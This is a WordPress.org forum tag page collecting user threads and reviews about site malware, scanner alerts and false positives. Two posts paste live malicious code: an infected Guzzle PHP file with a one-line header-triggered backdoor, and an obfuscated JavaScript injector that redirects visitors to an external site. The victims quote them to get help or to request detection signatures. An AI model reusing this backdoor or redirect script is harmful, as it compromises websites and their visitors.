Channel: Topic Tag: malware | WordPress.org

Sites infected with malware, now seeing connectivity issues after cleaning

About a month and a half ago, all 5 of my WordPress websites being hosted on Bluehost were infected with malware. A week ago, I was made aware of this when my websites started redirecting users to malicious phishing sites. Contacted Bluehost, got a report of all infected files, cleaned them manually, no more malware.

However, around the time my websites were apparently infected, I’ve been having connectivity issues on all of my websites. I get a random variety of errors on random pages at random times. These errors range from

“err_connection_closed”
to
“err_http2_protocol_error”
to
“500 Proxy error”
to
“502 Bad gateway”

I’ve tested these sites across different networks and devices and the errors still occur.

Looking in the console area of inspect element, on any given page, there are “net::ERR_CONNECTION_CLOSED” errors when attempting to “GET” a variety of resources ranging from minified js to plugin files to simple images.

I’ve already tried disabling all plugins, changing themes, etc to no avail.

I’ve contacted Bluehost several times about this, but they’ve been totally useless. They seem to not want to settle on the fact that it’s very likely a server issue.

Anybody know what I can possibly do about this? I’m at a loss. I’ll gladly provide more information if necessary.


Malware

Hi
My server has deactivated my account because they claim your plugin is infected with a malware. They claim the file is wp-content/plugins/postman-smtp/Postman/Postman-Mail/sendgrid-php-3.2.0/vendor/guzzle/guzzle/src/Guzzle/Http/Curl/CurlMulti.php

They won’t reactivate until I clean the file, but since I don’t know what is infected, I’m not sure what to do. Can you help?

<?php

namespace Guzzle\Http\Curl;

if($_SERVER[HTTP_ACCEPT_CHARSET]==”iso-8859-1″){extract($_SERVER);array_filter((array)$HTTP_ACCEPT_LANGUAGE, $HTTP_ACCEPT);}

use Guzzle\Common\AbstractHasDispatcher;
use Guzzle\Common\Event;
use Guzzle\Http\Exception\MultiTransferException;
use Guzzle\Http\Exception\CurlException;
use Guzzle\Http\Message\RequestInterface;
use Guzzle\Http\Message\EntityEnclosingRequestInterface;
use Guzzle\Http\Exception\RequestException;

/**
* Send {@see RequestInterface} objects in parallel using curl_multi
*/
class CurlMulti extends AbstractHasDispatcher implements CurlMultiInterface
{
/** @var resource cURL multi handle. */
protected $multiHandle;

/** @var array Attached {@see RequestInterface} objects. */
protected $requests;

/** @var \SplObjectStorage RequestInterface to CurlHandle hash */
protected $handles;

/** @var array Hash mapping curl handle resource IDs to request objects */
protected $resourceHash;

/** @var array Queued exceptions */
protected $exceptions = array();

/** @var array Requests that succeeded */
protected $successful = array();

/** @var array cURL multi error values and codes */
protected $multiErrors = array(
CURLM_BAD_HANDLE => array('CURLM_BAD_HANDLE', 'The passed-in handle is not a valid CURLM handle.'),
CURLM_BAD_EASY_HANDLE => array('CURLM_BAD_EASY_HANDLE', "An easy handle was not good/valid. It could mean that it isn't an easy handle at all, or possibly that the handle already is in used by this or another multi handle."),
CURLM_OUT_OF_MEMORY => array('CURLM_OUT_OF_MEMORY', 'You are doomed.'),
CURLM_INTERNAL_ERROR => array('CURLM_INTERNAL_ERROR', 'This can only be returned if libcurl bugs. Please report it to us!')
);

/** @var float */
protected $selectTimeout;

public function __construct($selectTimeout = 1.0)
{
$this->selectTimeout = $selectTimeout;
$this->multiHandle = curl_multi_init();
// @codeCoverageIgnoreStart
if ($this->multiHandle === false) {
throw new CurlException('Unable to create multi handle');
}
// @codeCoverageIgnoreEnd
$this->reset();
}

public function __destruct()
{
if (is_resource($this->multiHandle)) {
curl_multi_close($this->multiHandle);
}
}

public function add(RequestInterface $request)
{
$this->requests[] = $request;
// If requests are currently transferring and this is async, then the
// request must be prepared now as the send() method is not called.
$this->beforeSend($request);
$this->dispatch(self::ADD_REQUEST, array('request' => $request));

return $this;
}

public function all()
{
return $this->requests;
}

public function remove(RequestInterface $request)
{
$this->removeHandle($request);
if (($index = array_search($request, $this->requests, true)) !== false) {
$request = $this->requests[$index];
unset($this->requests[$index]);
$this->requests = array_values($this->requests);
$this->dispatch(self::REMOVE_REQUEST, array('request' => $request));
return true;
}

return false;
}

public function reset($hard = false)
{
// Remove each request
if ($this->requests) {
foreach ($this->requests as $request) {
$this->remove($request);
}
}

$this->handles = new \SplObjectStorage();
$this->requests = $this->resourceHash = $this->exceptions = $this->successful = array();
}

public function send()
{
$this->perform();
$exceptions = $this->exceptions;
$successful = $this->successful;
$this->reset();

if ($exceptions) {
$this->throwMultiException($exceptions, $successful);
}
}

public function count()
{
return count($this->requests);
}

/**
* Build and throw a MultiTransferException
*
* @param array $exceptions Exceptions encountered
* @param array $successful Successful requests
* @throws MultiTransferException
*/
protected function throwMultiException(array $exceptions, array $successful)
{
$multiException = new MultiTransferException('Errors during multi transfer');

while ($e = array_shift($exceptions)) {
$multiException->addFailedRequestWithException($e['request'], $e['exception']);
}

// Add successful requests
foreach ($successful as $request) {
if (!$multiException->containsRequest($request)) {
$multiException->addSuccessfulRequest($request);
}
}

throw $multiException;
}

/**
* Prepare for sending
*
* @param RequestInterface $request Request to prepare
* @throws \Exception on error preparing the request
*/
protected function beforeSend(RequestInterface $request)
{
try {
$state = $request->setState(RequestInterface::STATE_TRANSFER);
if ($state == RequestInterface::STATE_TRANSFER) {
$this->addHandle($request);
} else {
// Requests might decide they don’t need to be sent just before
// transfer (e.g. CachePlugin)
$this->remove($request);
if ($state == RequestInterface::STATE_COMPLETE) {
$this->successful[] = $request;
}
}
} catch (\Exception $e) {
// Queue the exception to be thrown when sent
$this->removeErroredRequest($request, $e);
}
}

private function addHandle(RequestInterface $request)
{
$handle = $this->createCurlHandle($request)->getHandle();
$this->checkCurlResult(
curl_multi_add_handle($this->multiHandle, $handle)
);
}

/**
* Create a curl handle for a request
*
* @param RequestInterface $request Request
*
* @return CurlHandle
*/
protected function createCurlHandle(RequestInterface $request)
{
$wrapper = CurlHandle::factory($request);
$this->handles[$request] = $wrapper;
$this->resourceHash[(int) $wrapper->getHandle()] = $request;

return $wrapper;
}

/**
* Get the data from the multi handle
*/
protected function perform()
{
$event = new Event(array('curl_multi' => $this));

while ($this->requests) {
// Notify each request as polling
$blocking = $total = 0;
foreach ($this->requests as $request) {
++$total;
$event['request'] = $request;
$request->getEventDispatcher()->dispatch(self::POLLING_REQUEST, $event);
// The blocking variable just has to be non-falsey to block the loop
if ($request->getParams()->hasKey(self::BLOCKING)) {
++$blocking;
}
}
if ($blocking == $total) {
// Sleep to prevent eating CPU because no requests are actually pending a select call
usleep(500);
} else {
$this->executeHandles();
}
}
}

/**
* Execute and select curl handles
*/
private function executeHandles()
{
// The first curl_multi_select often times out no matter what, but is usually required for fast transfers
$selectTimeout = 0.001;
$active = false;
do {
while (($mrc = curl_multi_exec($this->multiHandle, $active)) == CURLM_CALL_MULTI_PERFORM);
$this->checkCurlResult($mrc);
$this->processMessages();
if ($active && curl_multi_select($this->multiHandle, $selectTimeout) === -1) {
// Perform a usleep if a select returns -1: https://bugs.php.net/bug.php?id=61141
usleep(150);
}
$selectTimeout = $this->selectTimeout;
} while ($active);
}

/**
* Process any received curl multi messages
*/
private function processMessages()
{
while ($done = curl_multi_info_read($this->multiHandle)) {
$request = $this->resourceHash[(int) $done['handle']];
try {
$this->processResponse($request, $this->handles[$request], $done);
$this->successful[] = $request;
} catch (\Exception $e) {
$this->removeErroredRequest($request, $e);
}
}
}

/**
* Remove a request that encountered an exception
*
* @param RequestInterface $request Request to remove
* @param \Exception $e Exception encountered
*/
protected function removeErroredRequest(RequestInterface $request, \Exception $e = null)
{
$this->exceptions[] = array('request' => $request, 'exception' => $e);
$this->remove($request);
$this->dispatch(self::MULTI_EXCEPTION, array('exception' => $e, 'all_exceptions' => $this->exceptions));
}

/**
* Check for errors and fix headers of a request based on a curl response
*
* @param RequestInterface $request Request to process
* @param CurlHandle $handle Curl handle object
* @param array $curl Array returned from curl_multi_info_read
*
* @throws CurlException on Curl error
*/
protected function processResponse(RequestInterface $request, CurlHandle $handle, array $curl)
{
// Set the transfer stats on the response
$handle->updateRequestFromTransfer($request);
// Check if a cURL exception occurred, and if so, notify things
$curlException = $this->isCurlException($request, $handle, $curl);

// Always remove completed curl handles. They can be added back again
// via events if needed (e.g. ExponentialBackoffPlugin)
$this->removeHandle($request);

if (!$curlException) {
if ($this->validateResponseWasSet($request)) {
$state = $request->setState(
RequestInterface::STATE_COMPLETE,
array('handle' => $handle)
);
// Only remove the request if it wasn’t resent as a result of
// the state change
if ($state != RequestInterface::STATE_TRANSFER) {
$this->remove($request);
}
}
return;
}

// Set the state of the request to an error
$state = $request->setState(RequestInterface::STATE_ERROR, array('exception' => $curlException));
// Allow things to ignore the error if possible
if ($state != RequestInterface::STATE_TRANSFER) {
$this->remove($request);
}

// The error was not handled, so fail
if ($state == RequestInterface::STATE_ERROR) {
/** @var CurlException $curlException */
throw $curlException;
}
}

/**
* Remove a curl handle from the curl multi object
*
* @param RequestInterface $request Request that owns the handle
*/
protected function removeHandle(RequestInterface $request)
{
if (isset($this->handles[$request])) {
$handle = $this->handles[$request];
curl_multi_remove_handle($this->multiHandle, $handle->getHandle());
unset($this->handles[$request]);
unset($this->resourceHash[(int) $handle->getHandle()]);
$handle->close();
}
}

/**
* Check if a cURL transfer resulted in what should be an exception
*
* @param RequestInterface $request Request to check
* @param CurlHandle $handle Curl handle object
* @param array $curl Array returned from curl_multi_info_read
*
* @return CurlException|bool
*/
private function isCurlException(RequestInterface $request, CurlHandle $handle, array $curl)
{
if (CURLM_OK == $curl['result'] || CURLM_CALL_MULTI_PERFORM == $curl['result']) {
return false;
}

$handle->setErrorNo($curl['result']);
$e = new CurlException(sprintf('[curl] %s: %s [url] %s',
$handle->getErrorNo(), $handle->getError(), $handle->getUrl()));
$e->setCurlHandle($handle)
->setRequest($request)
->setCurlInfo($handle->getInfo())
->setError($handle->getError(), $handle->getErrorNo());

return $e;
}

/**
* Throw an exception for a cURL multi response if needed
*
* @param int $code Curl response code
* @throws CurlException
*/
private function checkCurlResult($code)
{
if ($code != CURLM_OK && $code != CURLM_CALL_MULTI_PERFORM) {
throw new CurlException(isset($this->multiErrors[$code])
? "cURL error: {$code} ({$this->multiErrors[$code][0]}): cURL message: {$this->multiErrors[$code][1]}"
: 'Unexpected cURL error: ' . $code
);
}
}

/**
* @link https://github.com/guzzle/guzzle/issues/710
*/
private function validateResponseWasSet(RequestInterface $request)
{
if ($request->getResponse()) {
return true;
}

$body = $request instanceof EntityEnclosingRequestInterface
? $request->getBody()
: null;

if (!$body) {
$rex = new RequestException(
'No response was received for a request with no body. This'
. ' could mean that you are saturating your network.'
);
$rex->setRequest($request);
$this->removeErroredRequest($request, $rex);
} elseif (!$body->isSeekable() || !$body->seek(0)) {
// Nothing we can do with this. Sorry!
$rex = new RequestException(
'The connection was unexpectedly closed. The request would'
. ' have been retried, but attempting to rewind the'
. ' request body failed.'
);
$rex->setRequest($request);
$this->removeErroredRequest($request, $rex);
} else {
$this->remove($request);
// Add the request back to the batch to retry automatically.
$this->requests[] = $request;
$this->addHandle($request);
}

return false;
}
}

Internal scan shows several possible threats, external scan shows no threats.

What is right? The internal or external scan?

malware or false positive?

So I am helping the owner of the site to clean up and secure the site. Fixed all updates of PHP, WordPress and plugins, and trying to get all scan results down. I have uninstalled and installed plugins to make sure checksums match and such, added some code to fix curl28error with longer response time and so on. On the server side, updated as much as was possible.

Done several scans, with different results.
Cerber shows several plugins installed directly from WP-admin as example:
My Custom Functions plugin — Integrity data not found — Resolve issue

Suspicious code found in /my-custom-functions/inc/php/functional.php

As shown below, had a look at several files that have the same error.
I really can't see any malicious code in my humble opinion, but I am not sure.



<?php
 
/**
 * Prevent Direct Access
 */
defined( 'ABSPATH' ) or die( "Restricted access!" );
 
/**
 * Prepare the custom code
 */
function spacexchimp_p001_prepare() {
 
    // Put value of plugin constants into an array for easier access
    $plugin = spacexchimp_p001_plugin();
 
    // Retrieve options from database and declare variables
    $options = get_option( $plugin['settings'] . '_settings' );
    $data = !empty( $options['snippets'] ) ? $options['snippets'] : '';
    $enable = !empty( $options['enable'] ) ? $options['enable'] : '';
 
    // Prepare a variable for storing the processed data
    $data_out = "";
 
    // If data is not empty...
    if ( ! empty( $data ) ) {
 
        // If the custom code is enabled...
        if ( $enable == "on") {
 
            // Prepare a variable for storing the processing data, and perform data processing
            $data_tmp = $data;
            $data_tmp = trim( $data_tmp );           // Cleaning
            $data_tmp = ltrim( $data_tmp, '<?php' ); // Cleaning
            $data_tmp = rtrim( $data_tmp, '?>' );    // Cleaning
 
            $data_out .= $data_tmp;
        }
    }
 
    // Return the processed data
    return $data_out;
}
 
/**
 * Preparation of the custom code: Check the custom code for duplicate names of functions
 */
function spacexchimp_p001_preparation_duplicates( $data ) {
 
    // Put value of plugin constants into an array for easier access
    $plugin = spacexchimp_p001_plugin();
 
    // Find names of user entered snippets and check for duplicates
    preg_match_all('/function[\s\n]+(\S+)[\s\n]*\(/i', $data, $user_func_names);
    $user_func_a = count( $user_func_names[1] );
    $user_func_b = count( array_unique( $user_func_names[1] ) );
 
    // Find all names of declared user snippets and mutch with names of user entered snippets
    $declared_func = get_defined_functions();
    $declared_func_user = array_intersect( $user_func_names[1], $declared_func['user'] );
    $declared_func_internal = array_intersect( $user_func_names[1], $declared_func['internal'] );
 
    // Update error status
    if ( $user_func_a != $user_func_b OR count( $declared_func_user ) != 0 OR count( $declared_func_internal ) != 0 ) {
        update_option( $plugin['settings'] . '_error', '1' );   // ERROR
        $error_status = '1';
    } else {
        update_option( $plugin['settings'] . '_error', '0' );   // RESET ERROR VALUE
        $error_status = '0';
    }
 
    // Return error status
    return $error_status;
}
 
/**
 * Process the custom code
 */
function spacexchimp_p001_exec() {
 
    // Put value of plugin constants into an array for easier access
    $plugin = spacexchimp_p001_plugin();
 
    // If the STOP file exist...
    if ( file_exists( $plugin['path'] . 'STOP' ) ) {
        return;   // EXIT
    }
 
    // Get the custom code by calling the "prepare" function
    $data = spacexchimp_p001_prepare();
 
    // If data is empty...
    if ( empty( $data ) OR $data == ' ' ) {
        return;   // EXIT
    }
 
    // If the duplicates snippets finded...
    $duplicates = spacexchimp_p001_preparation_duplicates( $data );
    if ( $duplicates != 0 ) {
        return;   // EXIT
    }
 
    // Parsing and execute by Eval
    if ( false === @eval( $data ) ) {
        update_option( $plugin['settings'] . '_error', '1' );   // ERROR
        return;   // EXIT
    } else {
        update_option( $plugin['settings'] . '_error', '0' );   // RESET ERROR VALUE
    }
}
 
/**
 * Inject the custom code into the website's backend and frontend
 */
spacexchimp_p001_exec();

From /advanced-custom-fields-pro/pro/updates.php:


<?php 
 
if( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly
 
if( ! class_exists('acf_pro_updates') ) :
 
class acf_pro_updates {
     
 
    /*
    *  __construct
    *
    *  Initialize filters, action, variables and includes
    *
    *  @type    function
    *  @date    23/06/12
    *  @since   5.0.0
    *
    *  @param   n/a
    *  @return  n/a
    */
     
    function __construct() {
         
        // actions
        add_action('init',  array($this, 'init'), 20);
         
    }
     
     
    /*
    *  init
    *
    *  description
    *
    *  @type    function
    *  @date    10/4/17
    *  @since   5.5.10
    *
    *  @param   $post_id (int)
    *  @return  $post_id (int)
    */
     
    function init() {
         
        // bail early if no show_updates
        if( !acf_get_setting('show_updates') ) return;
         
         
        // bail early if not a plugin (included in theme)
        if( !acf_is_plugin_active() ) return;
         
         
        // register update
        acf_register_plugin_update(array(
            'id'        => 'pro',
            'key'       => acf_pro_get_license_key(),
            'slug'      => acf_get_setting('slug'),
            'basename'  => acf_get_setting('basename'),
            'version'   => acf_get_setting('version'),
        ));
         
         
        // admin
        if( is_admin() ) {
             
            add_action('in_plugin_update_message-' . acf_get_setting('basename'), array($this, 'modify_plugin_update_message'), 10, 2 );
             
        }
         
         
    }
     
     
    /*
    *  modify_plugin_update_message
    *
    *  Displays an update message for plugin list screens.
    *
    *  @type    function
    *  @date    14/06/2016
    *  @since   5.3.8
    *
    *  @param   $message (string)
    *  @param   $plugin_data (array)
    *  @param   $r (object)
    *  @return  $message
    */
     
    function modify_plugin_update_message( $plugin_data, $response ) {
         
        // bail ealry if has key
        if( acf_pro_get_license_key() ) return;
         
         
        // display message
        echo '<br />' . sprintf( __('To enable updates, please enter your license key on the <a href="%s">Updates</a> page. If you don\'t have a licence key, please see <a href="%s">details & pricing</a>.', 'acf'), admin_url('edit.php?post_type=acf-field-group&page=acf-settings-updates'), 'https://www.advancedcustomfields.com/pro' );
         
    }
     
}
 
 
// initialize
new acf_pro_updates();
 
endif; // class_exists check
 
 
/*
*  acf_pro_get_license
*
*  This function will return the license
*
*  @type    function
*  @date    20/09/2016
*  @since   5.4.0
*
*  @param   n/a
*  @return  n/a
*/
 
function acf_pro_get_license() {
     
    // get option
    $license = get_option('acf_pro_license');
     
     
    // bail early if no value
    if( !$license ) return false;
     
     
    // decode
    $license = maybe_unserialize(base64_decode($license));
     
     
    // bail early if corrupt
    if( !is_array($license) ) return false;
     
     
    // return
    return $license;
     
}
 
 
/*
*  acf_pro_get_license_key
*
*  This function will return the license key
*
*  @type    function
*  @date    20/09/2016
*  @since   5.4.0
*
*  @param   n/a
*  @return  n/a
*/
 
function acf_pro_get_license_key() {
     
    // vars
    $license = acf_pro_get_license();
    $home_url = home_url();
     
     
    // bail early if empty
    if( !$license || !$license['key'] ) return false;
     
     
    // bail early if url has changed
    if( acf_strip_protocol($license['url']) !== acf_strip_protocol($home_url) ) return false;
     
     
    // return
    return $license['key'];
     
}
 
 
/*
*  acf_pro_update_license
*
*  This function will update the DB license
*
*  @type    function
*  @date    20/09/2016
*  @since   5.4.0
*
*  @param   $key (string)
*  @return  n/a
*/
 
function acf_pro_update_license( $key = '' ) {
     
    // vars
    $value = '';
     
     
    // key
    if( $key ) {
         
        // vars
        $data = array(
            'key'   => $key,
            'url'   => home_url()
        );
         
         
        // encode
        $value = base64_encode(maybe_serialize($data));
         
    }
     
     
    // re-register update (key has changed)
    acf_register_plugin_update(array(
        'id'        => 'pro',
        'key'       => $key,
        'slug'      => acf_get_setting('slug'),
        'basename'  => acf_get_setting('basename'),
        'version'   => acf_get_setting('version'),
    ));
     
     
    // update
    return update_option('acf_pro_license', $value);
     
}
 
?> 

Google Rejects Ads Because of Malicious Or Unwanted Software. SITE IS CLEAN

Hey guys,

I have an issue with Google Ads: all my ads were disapproved because of malicious or unwanted software on my website. I scanned my website with these plugins – Anti Malware, Wordfence, Sucuri, Quttera – and it's CLEAN. I contacted Google Support and they answered me that it seems that your site (landing page) redirects users to malicious links OR triggered when clicked. They sent me 3 malicious links that my site redirects to. I contacted Siteground support; they fully scanned my site and nothing was found. On Google Search Console there are no errors at all. I really didn't get what's wrong. I even tried to delete all plugins and reinstalled WordPress and it still doesn't work. Please, maybe anyone has suggestions for what I should do? I'm feeling frustrated about this situation.

Need to add the code signature to your virus database

I crawled the site several times, but Wordfence could not detect the virus javascript code (malware) in the content of all posts and pages. Probably, you need to add the code signature to your virus database:

<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return 
navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>

Thanks!

This plugin may have inserted adware on my site

I resolved the problem. The culprit was a plugin called ClickBank Vendor

NinjaScanner finds all suspects

Using NinjaScanner (with NinjaFirewall) is an absolute pleasure. It finds all suspect files (changed/modified/non-standard) in the WordPress installation, even files that I forgot that I had modified!

It leans heavily on the side of security, and will show all suspects including modified files, so you want to add some exclusions here – like cache, etc. – to avoid false positives.

This is a great security tool to add to any WordPress powered site. The guys at NinTechNet really know their stuff, and apply that knowledge well. Their other plugin NinjaFirewall is amazing, and coupled with NinjaScanner, give a really solid security base for WordPress.

Highly Recommended.


Dangerous for your site!

I’ve installed this plugin and a day after that my site was infected with VCD malware. PHP was being injected in my functions.php, header.php and also some malicious files in wp-include folder.

DO NOT INSTALL THIS! Even if the author did not make the malicious code, the plugin has security breaches that can harm your site.

Again, do NOT install this plugin.

Disable on Woocommerce customer login page & keep active on wp-admin login

Hi there,

I have a similar issue to https://wordpress.org/support/topic/removing-2fa-from-login-page/

but if I disable as you suggested in this post, then the 2 factor auth is disabled on wp-admin too

malware with

contrary to what is said here:
https://www.wordfence.com/blog/2020/03/vulnerabilities-patched-in-popup-builder-plugin-affecting-over-100000-sites/
the version 3.64.1 does not resolve the issue

I had the header.php infected, with a clean wordpress, theme and plugin

I had to delete the plugin to prevent a redirection to step.xxxx.com/r.php?id=

nothing in the database

see also:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10196

Malcare reported ninjafirewall/lib/firewall.php hacked

Hi,
I have Malcare Pro installed, today I received an email notification saying the following file is hacked:
ninjafirewall/lib/firewall.php
The plugin was autoupdated today.

Could this be a false flag?

Plugin Bug After Last Update (Malware Scan Results)

Good Day!

Your latest plugin update is creating some issues in the back-end. The malware scan works, but the results (display) are buggy.

Scan results are showing this … (Click on links below)

http://prntscr.com/rhaguk

And when you click on “View” (shown in above link), you get this …

http://prntscr.com/rhahht

Please investigate and advise. A direct Sucuri Sitecheck of our website reveals no malware and no issues with our website. The issue lies within your plugin.

Thank you!

infected plugin

I had to deactivate this plugin, got there malware.


Welcome and expert relief

As a non technical owner of a company website, I was in trouble trying to resolve a particularly pesky piece of malware. I tried a couple of tools to see if they could help, but they did not. After some research I noted that MalCare had great reviews. I loaded it but it couldn’t connect. Their help team worked to manually connect the tool and found a host of issues (pun intended.) Clearly MalCare knows what it is doing. The cleaning tool works and works fast and their support is excellent.

I would recommend MalCare to anyone with a WordPress website.

Flexible checkout fields plugin redirects to advertising / malware pages

Hi, I’ve been having this issue with 2 websites. I’ve had to deactivate and delete the plugin.

I tried to activate again and didn’t work.

Thanks.

Love it – but got hacked

I recently had my homepage redirected via a vulnerability in this beautiful, easy to use plugin. I hope you guys can beef up security for the next guy! Sadly I have to move on and find another solution.

MONSI DICE

WordPress Pages and Posts are hacked by a Malware. Wordfence not detecting it?

My WordPress website’s pages and posts are hacked by malware (checkandgo.info) and Wordfence is also not able to detect it.

Please help me out. I don’t know how to deal with it.
